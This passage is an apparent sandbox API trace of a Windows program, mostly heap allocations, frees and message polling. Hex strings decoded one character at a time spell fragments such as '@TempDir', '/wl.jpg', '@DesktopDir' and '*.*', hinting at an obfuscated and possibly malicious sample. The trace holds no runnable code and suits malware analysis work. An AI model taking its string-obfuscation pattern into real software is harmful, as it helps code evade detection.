(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a918 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a918 | out: hHeap=0x2af0000) returned 1 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0081.985] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8c8 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7f8 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec628 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8d8 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec640 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a978 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec670 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a978 | out: hHeap=0x2af0000) returned 1 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec418 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a868 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a868 | out: hHeap=0x2af0000) returned 1 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec448 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7d8 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7d8 | out: hHeap=0x2af0000) returned 1 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5f8 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0081.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec538 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec670 | out: hHeap=0x2af0000) returned 1 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0081.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec418 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec448 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec640 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8d8 | out: hHeap=0x2af0000) returned 1 [0081.986] lstrlenW (lpString="20") returned 2 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5f8 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec538 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec628 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7f8 | out: hHeap=0x2af0000) returned 1 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec460 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a798 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8c8 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec460 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a798 | out: hHeap=0x2af0000) returned 1 [0081.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0081.986] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.986] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a978 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4a8 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0081.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8b8 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3e8 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8f8 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6b8 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec610 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0081.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec478 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a788 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a898 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec478 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec610 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec628 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec400 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6b8 | out: hHeap=0x2af0000) returned 1 [0081.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8f8 | out: hHeap=0x2af0000) returned 1 [0081.988] lstrlenW (lpString="40") returned 2 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3d0 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7a8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3e8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8b8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4a8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a978 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6b8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7f8 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec688 | out: hHeap=0x2af0000) returned 1 [0081.988] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.988] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0081.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0081.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a958 | out: hHeap=0x2af0000) returned 1 [0081.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec430 | out: hHeap=0x2af0000) returned 1 [0081.989] lstrlenW (lpString="54") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="65") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="6D") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="70") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="44") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="69") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] lstrlenW (lpString="72") returned 2 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.989] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] lstrlenW (lpString="20") returned 2 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] lstrlenW (lpString="2F") returned 2 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] lstrlenW (lpString="77") returned 2 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] lstrlenW (lpString="6C") returned 2 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] lstrlenW (lpString="2E") returned 2 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.990] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="6A") returned 2 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="70") returned 2 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="67") returned 2 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="20") returned 2 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="30") returned 2 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.991] lstrlenW (lpString="20") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] lstrlenW (lpString="20") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] lstrlenW (lpString="40") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] lstrlenW (lpString="44") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] lstrlenW (lpString="65") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] lstrlenW (lpString="73") returned 2 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.992] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="6B") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="74") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="6F") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="70") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="44") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="69") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="72") returned 2 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.993] lstrlenW (lpString="20") returned 2 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] lstrlenW (lpString="2A") returned 2 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] lstrlenW (lpString="2E") returned 2 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] lstrlenW (lpString="2A") returned 2 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.994] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, 